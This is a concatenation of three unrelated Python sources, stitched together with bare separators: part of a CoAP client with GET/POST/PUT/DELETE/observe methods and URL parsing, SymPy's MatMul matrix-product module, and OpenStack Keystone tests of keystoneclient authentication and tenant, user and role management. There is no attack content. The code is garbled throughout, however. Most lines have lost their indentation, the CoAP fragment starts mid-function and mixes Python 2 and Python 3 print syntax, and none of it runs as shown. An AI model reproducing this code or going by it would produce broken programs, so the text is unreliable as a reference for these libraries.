# log.error("Received request")
pass
else:
self.handle_message(message)
key = hash(str(host) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
# handle separate
print "Separate Response"
self._response = message
self.condition.acquire()
self.condition.notify()
self.condition.release()
else:
# TODO handle notification
self._response = message
self.condition.acquire()
self.condition.notify()
self.condition.release()
if message.observe == 0:
self._receiver_thread = None
self.stop = True
def handle_response(self, response):
if response.type == defines.inv_types["CON"]:
ack = Message.new_ack(response)
self.send(ack, self._endpoint)
key_token = hash(str(self._endpoint[0]) + str(self._endpoint[1]) + str(response.token))
if key_token in self.sent_token.keys():
self.received_token[key_token] = response
req = self.sent_token[key_token]
key = hash(str(self._endpoint[0]) + str(self._endpoint[1]) + str(req.mid))
timer, counter = self.call_id[key]
timer.cancel()
self.received[key] = response
self.condition.acquire()
self._response = response
self.condition.notify()
self.condition.release()
def handle_message(self, message):
key = hash(str(self._endpoint[0]) + str(self._endpoint[1]) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
return None
if key in self.sent.keys():
self.received[key] = message
if message.type == defines.inv_types["RST"]:
self._response = message
else:
# log.error("Received unattended message")
# handle error
self._response = "Received unattended message"
self.condition.acquire()
self.condition.notify()
self.condition.release()
def parse_path(self, path):
m = re.match("([a-zA-Z]{4,5})://([a-zA-Z0-9.]*):([0-9]*)/(\S*)", path)
if m is None:
m = re.match("([a-zA-Z]{4,5})://([a-zA-Z0-9.]*)/(\S*)", path)
if m is None:
m = re.match("([a-zA-Z]{4,5})://([a-zA-Z0-9.]*)", path)
if m is None:
ip, port, path = self.parse_path_ipv6(path)
else:
ip = m.group(2)
port = 5683
path = ""
else:
ip = m.group(2)
port = 5683
path = m.group(3)
else:
ip = m.group(2)
port = int(m.group(3))
path = m.group(4)
return ip, port, path
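    # Illustrative inputs (hypothetical addresses):
    #     parse_path("coap://192.168.1.5:5683/temp") -> ("192.168.1.5", 5683, "temp")
    #     parse_path("coap://192.168.1.5/temp")      -> ("192.168.1.5", 5683, "temp")
    #     parse_path("coap://192.168.1.5")           -> ("192.168.1.5", 5683, "")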
def get(self, *args, **kwargs):
"""
:param args: request object
:param kwargs: dictionary with parameters
"""
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
ip, port = endpoint
else:
request = Request()
path = kwargs['path']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
request.destination = (ip, port)
request.uri_path = path
endpoint = (ip, port)
request.code = defines.inv_codes["GET"]
self.send(request, endpoint)
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
retransmit_count = 0
self.condition.acquire()
while True:
self.condition.wait(timeout=future_time)
if self._response is not None:
break
if request.type == defines.inv_types['CON']:
if retransmit_count < defines.MAX_RETRANSMIT and (not request.acknowledged and not request.rejected):
print("retransmit")
retransmit_count += 1
future_time *= 2
self.send(request, endpoint)
else:
print("Give up on message: " + str(request.mid))
self.stop = True
break
message = self._response
self._response = None
key = hash(str(ip) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
self.condition.acquire()
self.condition.wait()
message = self._response
self._response = None
return message
def observe(self, *args, **kwargs):
"""
:param args: request object
:param kwargs: dictionary with parameters
"""
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
else:
request = Request()
path = kwargs['path']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
request.destination = (ip, port)
request.uri_path = path
endpoint = (ip, port)
request.code = defines.inv_codes["GET"]
request.observe = 0
self.send(request, endpoint)
def notification(self, *args, **kwargs):
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
ip, port = endpoint
else:
request = Request()
path = kwargs['path']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
endpoint = (ip, port)
self.condition.acquire()
self.condition.wait()
message = self._response
key = hash(str(ip) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
return message
def delete(self, *args, **kwargs):
"""
:param args: request object
:param kwargs: dictionary with parameters
"""
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
ip, port = endpoint
else:
request = Request()
path = kwargs['path']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
request.destination = (ip, port)
request.uri_path = path
endpoint = (ip, port)
request.code = defines.inv_codes["DELETE"]
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
key = hash(str(ip) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
return message
def post(self, *args, **kwargs):
"""
:param args: request object
:param kwargs: dictionary with parameters
"""
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
payload = request.payload
ip, port = endpoint
else:
request = Request()
path = kwargs['path']
payload = kwargs['payload']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
request.destination = (ip, port)
request.uri_path = path
endpoint = (ip, port)
request.code = defines.inv_codes["POST"]
request.payload = payload
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
key = hash(str(ip) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
return message
def put(self, *args, **kwargs):
"""
:param args: request object
:param kwargs: dictionary with parameters
"""
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
ip, port = endpoint
payload = request.payload
else:
request = Request()
path = kwargs['path']
payload = kwargs['payload']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
request.destination = (ip, port)
request.uri_path = path
endpoint = (ip, port)
request.code = defines.inv_codes["PUT"]
request.payload = payload
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
key = hash(str(ip) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
return message
def discover(self, *args, **kwargs):
"""
:param args: request object
:param kwargs: dictionary with parameters
"""
if len(args) > 0:
request = args[0]
assert(isinstance(request, Request))
endpoint = request.destination
ip, port = endpoint
else:
request = Request()
path = kwargs['path']
assert(isinstance(path, str))
ip, port, path = self.parse_path(path)
request.destination = (ip, port)
if path == "":
path = defines.DISCOVERY_URL
request.uri_path = path
endpoint = (ip, port)
request.code = defines.inv_codes["GET"]
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
key = hash(str(ip) + str(port) + str(message.mid))
if message.type == defines.inv_types["ACK"] and message.code == defines.inv_codes["EMPTY"] \
and key in self.sent.keys():
# Separate Response
self.send(request, endpoint)
self.condition.acquire()
self.condition.wait()
message = self._response
return message
@staticmethod
def parse_path_ipv6(path):
m = re.match("([a-zA-Z]{4,5})://\[([a-fA-F0-9:]*)\]:([0-9]*)/(\S*)", path)
if m is None:
m = re.match("([a-zA-Z]{4,5})://\[([a-fA-F0-9:]*)\]/(\S*)", path)
if m is None:
m = re.match("([a-zA-Z]{4,5})://\[([a-fA-F0-9:]*)\]", path)
ip = m.group(2)
port = 5683
path = ""
else:
ip = m.group(2)
port = 5683
path = m.group(3)
else:
ip = m.group(2)
port = int(m.group(3))
path = m.group(4)
return ip, port, path
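# Minimal usage sketch (hypothetical: assumes this client class is constructed
# with the server endpoint and that a receiver thread runs datagram_received):
#
#     client = CoAPClient(("127.0.0.1", 5683))
#     response = client.get(path="coap://127.0.0.1:5683/hello")
#     print(response.payload)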
|
|
from __future__ import print_function, division
from sympy.core import Mul, Basic, sympify, Add
from sympy.core.compatibility import range
from sympy.functions import adjoint
from sympy.matrices.expressions.transpose import transpose
from sympy.strategies import (rm_id, unpack, typed, flatten, exhaust,
do_one, new)
from sympy.matrices.expressions.matexpr import (MatrixExpr, ShapeError,
Identity, ZeroMatrix)
from sympy.matrices.matrices import MatrixBase
class MatMul(MatrixExpr):
"""
A product of matrix expressions
Examples
========
>>> from sympy import MatMul, MatrixSymbol
>>> A = MatrixSymbol('A', 5, 4)
>>> B = MatrixSymbol('B', 4, 3)
>>> C = MatrixSymbol('C', 3, 6)
>>> MatMul(A, B, C)
A*B*C
"""
is_MatMul = True
def __new__(cls, *args, **kwargs):
check = kwargs.get('check', True)
args = list(map(sympify, args))
obj = Basic.__new__(cls, *args)
factor, matrices = obj.as_coeff_matrices()
if check:
validate(*matrices)
return obj
@property
def shape(self):
matrices = [arg for arg in self.args if arg.is_Matrix]
return (matrices[0].rows, matrices[-1].cols)
def _entry(self, i, j, expand=True):
coeff, matrices = self.as_coeff_matrices()
if len(matrices) == 1: # situation like 2*X, matmul is just X
return coeff * matrices[0][i, j]
head, tail = matrices[0], matrices[1:]
if len(tail) == 0:
raise ValueError("lenth of tail cannot be 0")
X = head
Y = MatMul(*tail)
from sympy.core.symbol import Dummy
from sympy.concrete.summations import Sum
from sympy.matrices import ImmutableMatrix
k = Dummy('k', integer=True)
if X.has(ImmutableMatrix) or Y.has(ImmutableMatrix):
return coeff*Add(*[X[i, k]*Y[k, j] for k in range(X.cols)])
result = Sum(coeff*X[i, k]*Y[k, j], (k, 0, X.cols - 1))
return result.doit() if expand else result
def as_coeff_matrices(self):
scalars = [x for x in self.args if not x.is_Matrix]
matrices = [x for x in self.args if x.is_Matrix]
coeff = Mul(*scalars)
return coeff, matrices
def as_coeff_mmul(self):
coeff, matrices = self.as_coeff_matrices()
return coeff, MatMul(*matrices)
def _eval_transpose(self):
return MatMul(*[transpose(arg) for arg in self.args[::-1]]).doit()
def _eval_adjoint(self):
return MatMul(*[adjoint(arg) for arg in self.args[::-1]]).doit()
def _eval_trace(self):
factor, mmul = self.as_coeff_mmul()
if factor != 1:
from .trace import Trace
return factor * Trace(mmul)
else:
raise NotImplementedError("Can't simplify any further")
def _eval_determinant(self):
from sympy.matrices.expressions.determinant import Determinant
factor, matrices = self.as_coeff_matrices()
square_matrices = only_squares(*matrices)
return factor**self.rows * Mul(*list(map(Determinant, square_matrices)))
def _eval_inverse(self):
try:
return MatMul(*[
arg.inverse() if isinstance(arg, MatrixExpr) else arg**-1
for arg in self.args[::-1]]).doit()
except ShapeError:
from sympy.matrices.expressions.inverse import Inverse
return Inverse(self)
def doit(self, **kwargs):
deep = kwargs.get('deep', True)
if deep:
args = [arg.doit(**kwargs) for arg in self.args]
else:
args = self.args
return canonicalize(MatMul(*args))
def validate(*matrices):
""" Checks for valid shapes for args of MatMul """
for i in range(len(matrices)-1):
A, B = matrices[i:i+2]
if A.cols != B.rows:
raise ShapeError("Matrices %s and %s are not aligned"%(A, B))
# Rules
def newmul(*args):
if args[0] == 1:
args = args[1:]
return new(MatMul, *args)
def any_zeros(mul):
    if any(arg.is_zero or (arg.is_Matrix and arg.is_ZeroMatrix)
           for arg in mul.args):
matrices = [arg for arg in mul.args if arg.is_Matrix]
return ZeroMatrix(matrices[0].rows, matrices[-1].cols)
return mul
def merge_explicit(matmul):
""" Merge explicit MatrixBase arguments
>>> from sympy import MatrixSymbol, eye, Matrix, MatMul, pprint
>>> from sympy.matrices.expressions.matmul import merge_explicit
>>> A = MatrixSymbol('A', 2, 2)
>>> B = Matrix([[1, 1], [1, 1]])
>>> C = Matrix([[1, 2], [3, 4]])
>>> X = MatMul(A, B, C)
>>> pprint(X)
A*[1 1]*[1 2]
[ ] [ ]
[1 1] [3 4]
>>> pprint(merge_explicit(X))
A*[4 6]
[ ]
[4 6]
>>> X = MatMul(B, A, C)
>>> pprint(X)
[1 1]*A*[1 2]
[ ] [ ]
[1 1] [3 4]
>>> pprint(merge_explicit(X))
[1 1]*A*[1 2]
[ ] [ ]
[1 1] [3 4]
"""
if not any(isinstance(arg, MatrixBase) for arg in matmul.args):
return matmul
newargs = []
last = matmul.args[0]
for arg in matmul.args[1:]:
if isinstance(arg, MatrixBase) and isinstance(last, MatrixBase):
last = last * arg
else:
newargs.append(last)
last = arg
newargs.append(last)
return MatMul(*newargs)
def xxinv(mul):
""" Y * X * X.I -> Y """
factor, matrices = mul.as_coeff_matrices()
for i, (X, Y) in enumerate(zip(matrices[:-1], matrices[1:])):
try:
if X.is_square and Y.is_square and X == Y.inverse():
I = Identity(X.rows)
return newmul(factor, *(matrices[:i] + [I] + matrices[i+2:]))
except ValueError: # Y might not be invertible
pass
return mul
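# Illustrative case: with X square and invertible, MatMul(Y, X, X.inverse())
# has the (X, X.inverse()) pair replaced by a single Identity(X.rows); the
# remove_ids rule then strips that Identity on a later canonicalization pass.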
def remove_ids(mul):
""" Remove Identities from a MatMul
This is a modified version of sympy.strategies.rm_id.
    This is necessary because MatMul may contain both MatrixExprs and Exprs
as args.
See Also
--------
sympy.strategies.rm_id
"""
# Separate Exprs from MatrixExprs in args
factor, mmul = mul.as_coeff_mmul()
# Apply standard rm_id for MatMuls
result = rm_id(lambda x: x.is_Identity is True)(mmul)
if result != mmul:
return newmul(factor, *result.args) # Recombine and return
else:
return mul
def factor_in_front(mul):
factor, matrices = mul.as_coeff_matrices()
if factor != 1:
return newmul(factor, *matrices)
return mul
rules = (any_zeros, remove_ids, xxinv, unpack, rm_id(lambda x: x == 1),
merge_explicit, factor_in_front, flatten)
canonicalize = exhaust(typed({MatMul: do_one(*rules)}))
def only_squares(*matrices):
""" factor matrices only if they are square """
if matrices[0].rows != matrices[-1].cols:
raise RuntimeError("Invalid matrices being multiplied")
out = []
start = 0
for i, M in enumerate(matrices):
if M.cols == matrices[start].rows:
out.append(MatMul(*matrices[start:i+1]).doit())
start = i+1
return out
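# Sketch of the determinant factoring this enables (assuming A is 2x3 and B is
# 3x2, so A*B is square): only_squares(A, B) returns [A*B], and
# _eval_determinant computes factor**2 * Determinant(A*B).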
from sympy.assumptions.ask import ask, Q
from sympy.assumptions.refine import handlers_dict
def refine_MatMul(expr, assumptions):
"""
>>> from sympy import MatrixSymbol, Q, assuming, refine
>>> X = MatrixSymbol('X', 2, 2)
>>> expr = X * X.T
>>> print(expr)
X*X'
>>> with assuming(Q.orthogonal(X)):
... print(refine(expr))
I
"""
newargs = []
last = expr.args[0]
for arg in expr.args[1:]:
if arg == last.T and ask(Q.orthogonal(arg), assumptions):
last = Identity(arg.shape[0])
elif arg == last.conjugate() and ask(Q.unitary(arg), assumptions):
last = Identity(arg.shape[0])
else:
newargs.append(last)
last = arg
newargs.append(last)
return MatMul(*newargs)
handlers_dict['MatMul'] = refine_MatMul
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import uuid
import nose.exc
from keystone import test
import default_fixtures
OPENSTACK_REPO = 'https://review.openstack.org/p/openstack'
KEYSTONECLIENT_REPO = '%s/python-keystoneclient.git' % OPENSTACK_REPO
class CompatTestCase(test.TestCase):
def setUp(self):
super(CompatTestCase, self).setUp()
revdir = test.checkout_vendor(*self.get_checkout())
self.add_path(revdir)
self.clear_module('keystoneclient')
self.load_backends()
self.load_fixtures(default_fixtures)
self.public_server = self.serveapp('keystone', name='main')
self.admin_server = self.serveapp('keystone', name='admin')
# TODO(termie): is_admin is being deprecated once the policy stuff
# is all working
# TODO(termie): add an admin user to the fixtures and use that user
# override the fixtures, for now
self.metadata_foobar = self.identity_api.update_metadata(
self.user_foo['id'], self.tenant_bar['id'],
dict(roles=['keystone_admin'], is_admin='1'))
def tearDown(self):
self.public_server.kill()
self.admin_server.kill()
self.public_server = None
self.admin_server = None
super(CompatTestCase, self).tearDown()
def _public_url(self):
public_port = self.public_server.socket_info['socket'][1]
return "http://localhost:%s/v2.0" % public_port
def _admin_url(self):
admin_port = self.admin_server.socket_info['socket'][1]
return "http://localhost:%s/v2.0" % admin_port
def _client(self, admin=False, **kwargs):
from keystoneclient.v2_0 import client as ks_client
url = self._admin_url() if admin else self._public_url()
kc = ks_client.Client(endpoint=url,
auth_url=self._public_url(),
**kwargs)
kc.authenticate()
# have to manually overwrite the management url after authentication
kc.management_url = url
return kc
def get_client(self, user_ref=None, tenant_ref=None, admin=False):
if user_ref is None:
user_ref = self.user_foo
if tenant_ref is None:
            for user in default_fixtures.USERS:
                if user['id'] == user_ref['id']:
                    tenant_id = user['tenants'][0]
                    break
else:
tenant_id = tenant_ref['id']
return self._client(username=user_ref['name'],
password=user_ref['password'],
tenant_id=tenant_id,
admin=admin)
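    # Hedged usage sketch inside a test method (user_foo and tenant 'bar' come
    # from default_fixtures; exact fixture contents are assumed):
    #
    #     client = self.get_client(admin=True)
    #     tenants = client.tenants.list()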
class KeystoneClientTests(object):
"""Tests for all versions of keystoneclient."""
def test_authenticate_tenant_name_and_tenants(self):
client = self.get_client()
tenants = client.tenants.list()
self.assertEquals(tenants[0].id, self.tenant_bar['id'])
def test_authenticate_tenant_id_and_tenants(self):
client = self._client(username=self.user_foo['name'],
password=self.user_foo['password'],
tenant_id='bar')
tenants = client.tenants.list()
self.assertEquals(tenants[0].id, self.tenant_bar['id'])
def test_authenticate_invalid_tenant_id(self):
from keystoneclient import exceptions as client_exceptions
self.assertRaises(client_exceptions.Unauthorized,
self._client,
username=self.user_foo['name'],
password=self.user_foo['password'],
tenant_id='baz')
def test_authenticate_token_no_tenant(self):
client = self.get_client()
token = client.auth_token
token_client = self._client(token=token)
tenants = token_client.tenants.list()
self.assertEquals(tenants[0].id, self.tenant_bar['id'])
def test_authenticate_token_tenant_id(self):
client = self.get_client()
token = client.auth_token
token_client = self._client(token=token, tenant_id='bar')
tenants = token_client.tenants.list()
self.assertEquals(tenants[0].id, self.tenant_bar['id'])
def test_authenticate_token_invalid_tenant_id(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
token = client.auth_token
self.assertRaises(client_exceptions.AuthorizationFailure,
self._client, token=token, tenant_id='baz')
def test_authenticate_token_tenant_name(self):
client = self.get_client()
token = client.auth_token
token_client = self._client(token=token, tenant_name='BAR')
tenants = token_client.tenants.list()
        self.assertEquals(tenants[0].id, self.tenant_bar['id'])
def test_authenticate_and_delete_token(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
token = client.auth_token
token_client = self._client(token=token)
tenants = token_client.tenants.list()
self.assertEquals(tenants[0].id, self.tenant_bar['id'])
client.tokens.delete(token_client.auth_token)
self.assertRaises(client_exceptions.Unauthorized,
token_client.tenants.list)
def test_authenticate_no_password(self):
from keystoneclient import exceptions as client_exceptions
user_ref = self.user_foo.copy()
user_ref['password'] = None
self.assertRaises(client_exceptions.AuthorizationFailure,
self.get_client,
user_ref)
def test_authenticate_no_username(self):
from keystoneclient import exceptions as client_exceptions
user_ref = self.user_foo.copy()
user_ref['name'] = None
self.assertRaises(client_exceptions.AuthorizationFailure,
self.get_client,
user_ref)
def test_authenticate_disabled_tenant(self):
from keystoneclient import exceptions as client_exceptions
admin_client = self.get_client(admin=True)
tenant = {
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': False,
}
tenant_ref = admin_client.tenants.create(
tenant_name=tenant['name'],
description=tenant['description'],
enabled=tenant['enabled'])
tenant['id'] = tenant_ref.id
user = {
'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex,
'email': uuid.uuid4().hex,
'tenant_id': tenant['id'],
}
user_ref = admin_client.users.create(
name=user['name'],
password=user['password'],
email=user['email'],
tenant_id=user['tenant_id'])
user['id'] = user_ref.id
# password authentication
self.assertRaises(
client_exceptions.Unauthorized,
self._client,
username=user['name'],
password=user['password'],
tenant_id=tenant['id'])
# token authentication
client = self._client(
username=user['name'],
password=user['password'])
self.assertRaises(
client_exceptions.Unauthorized,
self._client,
token=client.auth_token,
tenant_id=tenant['id'])
    # FIXME(ja): this test should require the "keystone:admin" role
    # (probably the role set via --keystone_admin_role flag)
# FIXME(ja): add a test that admin endpoint is only sent to admin user
# FIXME(ja): add a test that admin endpoint returns unauthorized if not
# admin
def test_tenant_create_update_and_delete(self):
from keystoneclient import exceptions as client_exceptions
tenant_name = 'original_tenant'
tenant_description = 'My original tenant!'
tenant_enabled = True
client = self.get_client(admin=True)
# create, get, and list a tenant
tenant = client.tenants.create(tenant_name=tenant_name,
description=tenant_description,
enabled=tenant_enabled)
self.assertEquals(tenant.name, tenant_name)
self.assertEquals(tenant.description, tenant_description)
self.assertEquals(tenant.enabled, tenant_enabled)
tenant = client.tenants.get(tenant_id=tenant.id)
self.assertEquals(tenant.name, tenant_name)
self.assertEquals(tenant.description, tenant_description)
self.assertEquals(tenant.enabled, tenant_enabled)
tenant = [t for t in client.tenants.list() if t.id == tenant.id].pop()
self.assertEquals(tenant.name, tenant_name)
self.assertEquals(tenant.description, tenant_description)
self.assertEquals(tenant.enabled, tenant_enabled)
# update, get, and list a tenant
tenant_name = 'updated_tenant'
tenant_description = 'Updated tenant!'
tenant_enabled = False
tenant = client.tenants.update(tenant_id=tenant.id,
tenant_name=tenant_name,
enabled=tenant_enabled,
description=tenant_description)
self.assertEquals(tenant.name, tenant_name)
self.assertEquals(tenant.description, tenant_description)
self.assertEquals(tenant.enabled, tenant_enabled)
tenant = client.tenants.get(tenant_id=tenant.id)
self.assertEquals(tenant.name, tenant_name)
self.assertEquals(tenant.description, tenant_description)
self.assertEquals(tenant.enabled, tenant_enabled)
tenant = [t for t in client.tenants.list() if t.id == tenant.id].pop()
self.assertEquals(tenant.name, tenant_name)
self.assertEquals(tenant.description, tenant_description)
self.assertEquals(tenant.enabled, tenant_enabled)
# delete, get, and list a tenant
client.tenants.delete(tenant=tenant.id)
self.assertRaises(client_exceptions.NotFound, client.tenants.get,
tenant.id)
self.assertFalse([t for t in client.tenants.list()
if t.id == tenant.id])
def test_tenant_delete_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.tenants.delete,
tenant=uuid.uuid4().hex)
def test_tenant_get_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.tenants.get,
tenant_id=uuid.uuid4().hex)
def test_tenant_update_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.tenants.update,
tenant_id=uuid.uuid4().hex)
def test_tenant_list(self):
client = self.get_client()
tenants = client.tenants.list()
self.assertEquals(len(tenants), 1)
# Admin endpoint should return *all* tenants
client = self.get_client(admin=True)
tenants = client.tenants.list()
self.assertEquals(len(tenants), len(default_fixtures.TENANTS))
def test_invalid_password(self):
from keystoneclient import exceptions as client_exceptions
good_client = self._client(username=self.user_foo['name'],
password=self.user_foo['password'])
good_client.tenants.list()
self.assertRaises(client_exceptions.Unauthorized,
self._client,
username=self.user_foo['name'],
password='invalid')
def test_invalid_user_password(self):
from keystoneclient import exceptions as client_exceptions
self.assertRaises(client_exceptions.Unauthorized,
self._client,
username='blah',
password='blah')
def test_change_password_invalidates_token(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
username = uuid.uuid4().hex
passwd = uuid.uuid4().hex
user = client.users.create(name=username, password=passwd,
email=uuid.uuid4().hex)
token_id = client.tokens.authenticate(username=username,
password=passwd).id
# authenticate with a token should work before a password change
client.tokens.authenticate(token=token_id)
client.users.update_password(user=user.id, password=uuid.uuid4().hex)
# authenticate with a token should not work after a password change
self.assertRaises(client_exceptions.Unauthorized,
client.tokens.authenticate,
token=token_id)
def test_disable_user_invalidates_token(self):
from keystoneclient import exceptions as client_exceptions
admin_client = self.get_client(admin=True)
foo_client = self.get_client(self.user_foo)
admin_client.users.update_enabled(user=self.user_foo['id'],
enabled=False)
self.assertRaises(client_exceptions.Unauthorized,
foo_client.tokens.authenticate,
token=foo_client.auth_token)
self.assertRaises(client_exceptions.Unauthorized,
self.get_client,
self.user_foo)
def test_token_expiry_maintained(self):
foo_client = self.get_client(self.user_foo)
orig_token = foo_client.service_catalog.catalog['token']
time.sleep(1.01)
reauthenticated_token = foo_client.tokens.authenticate(
token=foo_client.auth_token)
self.assertEquals(orig_token['expires'],
reauthenticated_token.expires)
def test_user_create_update_delete(self):
from keystoneclient import exceptions as client_exceptions
test_username = 'new_user'
client = self.get_client(admin=True)
user = client.users.create(name=test_username,
password='password',
email='user1@test.com')
self.assertEquals(user.name, test_username)
user = client.users.get(user=user.id)
self.assertEquals(user.name, test_username)
user = client.users.update(user=user,
name=test_username,
email='user2@test.com')
self.assertEquals(user.email, 'user2@test.com')
# NOTE(termie): update_enabled doesn't return anything, probably a bug
client.users.update_enabled(user=user, enabled=False)
user = client.users.get(user.id)
self.assertFalse(user.enabled)
self.assertRaises(client_exceptions.Unauthorized,
self._client,
username=test_username,
password='password')
client.users.update_enabled(user, True)
user = client.users.update_password(user=user, password='password2')
self._client(username=test_username,
password='password2')
user = client.users.update_tenant(user=user, tenant='bar')
# TODO(ja): once keystonelight supports default tenant
# when you login without specifying tenant, the
# token should be scoped to tenant 'bar'
client.users.delete(user.id)
self.assertRaises(client_exceptions.NotFound, client.users.get,
user.id)
# Test creating a user with a tenant (auto-add to tenant)
user2 = client.users.create(name=test_username,
password='password',
email='user1@test.com',
tenant_id='bar')
self.assertEquals(user2.name, test_username)
def test_user_create_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.create,
name=uuid.uuid4().hex,
password=uuid.uuid4().hex,
email=uuid.uuid4().hex,
tenant_id=uuid.uuid4().hex)
def test_user_get_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.get,
user=uuid.uuid4().hex)
def test_user_list_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.list,
tenant_id=uuid.uuid4().hex)
def test_user_update_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.update,
user=uuid.uuid4().hex)
def test_user_update_tenant_404(self):
raise nose.exc.SkipTest('N/A')
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.update,
user=self.user_foo['id'],
tenant_id=uuid.uuid4().hex)
def test_user_update_password_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.update_password,
user=uuid.uuid4().hex,
password=uuid.uuid4().hex)
def test_user_delete_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.delete,
user=uuid.uuid4().hex)
def test_user_list(self):
client = self.get_client(admin=True)
users = client.users.list()
self.assertTrue(len(users) > 0)
user = users[0]
self.assertRaises(AttributeError, lambda: user.password)
def test_user_get(self):
client = self.get_client(admin=True)
user = client.users.get(user=self.user_foo['id'])
self.assertRaises(AttributeError, lambda: user.password)
def test_role_get(self):
client = self.get_client(admin=True)
role = client.roles.get(role='keystone_admin')
self.assertEquals(role.id, 'keystone_admin')
def test_role_crud(self):
from keystoneclient import exceptions as client_exceptions
test_role = 'new_role'
client = self.get_client(admin=True)
role = client.roles.create(name=test_role)
self.assertEquals(role.name, test_role)
role = client.roles.get(role=role.id)
self.assertEquals(role.name, test_role)
client.roles.delete(role=role.id)
self.assertRaises(client_exceptions.NotFound,
client.roles.delete,
role=role.id)
self.assertRaises(client_exceptions.NotFound,
client.roles.get,
role=role.id)
def test_role_get_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.roles.get,
role=uuid.uuid4().hex)
def test_role_delete_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.roles.delete,
role=uuid.uuid4().hex)
def test_role_list_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.roles.roles_for_user,
user=uuid.uuid4().hex,
tenant=uuid.uuid4().hex)
self.assertRaises(client_exceptions.NotFound,
client.roles.roles_for_user,
user=self.user_foo['id'],
tenant=uuid.uuid4().hex)
self.assertRaises(client_exceptions.NotFound,
client.roles.roles_for_user,
user=uuid.uuid4().hex,
tenant=self.tenant_bar['id'])
def test_role_list(self):
client = self.get_client(admin=True)
roles = client.roles.list()
# TODO(devcamcar): This assert should be more specific.
self.assertTrue(len(roles) > 0)
def test_ec2_credential_crud(self):
client = self.get_client()
creds = client.ec2.list(user_id=self.user_foo['id'])
self.assertEquals(creds, [])
cred = client.ec2.create(user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'])
creds = client.ec2.list(user_id=self.user_foo['id'])
self.assertEquals(creds, [cred])
got = client.ec2.get(user_id=self.user_foo['id'], access=cred.access)
self.assertEquals(cred, got)
client.ec2.delete(user_id=self.user_foo['id'], access=cred.access)
